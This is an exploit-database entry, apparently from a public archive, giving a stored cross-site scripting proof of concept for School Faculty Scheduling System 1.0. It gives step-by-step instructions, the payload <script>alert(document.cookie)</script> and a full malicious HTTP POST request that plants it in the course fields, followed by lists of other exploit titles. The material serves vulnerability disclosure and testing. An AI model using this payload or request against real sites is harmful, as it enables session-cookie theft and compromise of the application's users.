Menu

Search for hundreds of thousands of exploits

"School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC"

Author

Exploit author

"Jyotsna Adhana"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses

Step 2: use payload <script>alert(document.cookie)</script> in Course and Description field

Malicious Request

POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793
Content-Length: 478
Origin: http://localhost
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re

-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="id"


-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="course"

<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="description"

<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793--

Step 3: Cookie will be reflected each time someone visits the Course List section.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-10-23 "Gym Management System 1.0 - Stored Cross Site Scripting" webapps php "Jyotsna Adhana"
2020-10-23 "School Faculty Scheduling System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "School Faculty Scheduling System 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Gym Management System 1.0 - Authentication Bypass" webapps php "Jyotsna Adhana"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-21 "School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC" webapps php "Jyotsna Adhana"
2020-10-21 "School Faculty Scheduling System 1.0 - Authentication Bypass POC" webapps php "Jyotsna Adhana"
2020-10-15 "Zoo Management System 1.0 - Authentication Bypass" webapps php "Jyotsna Adhana"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.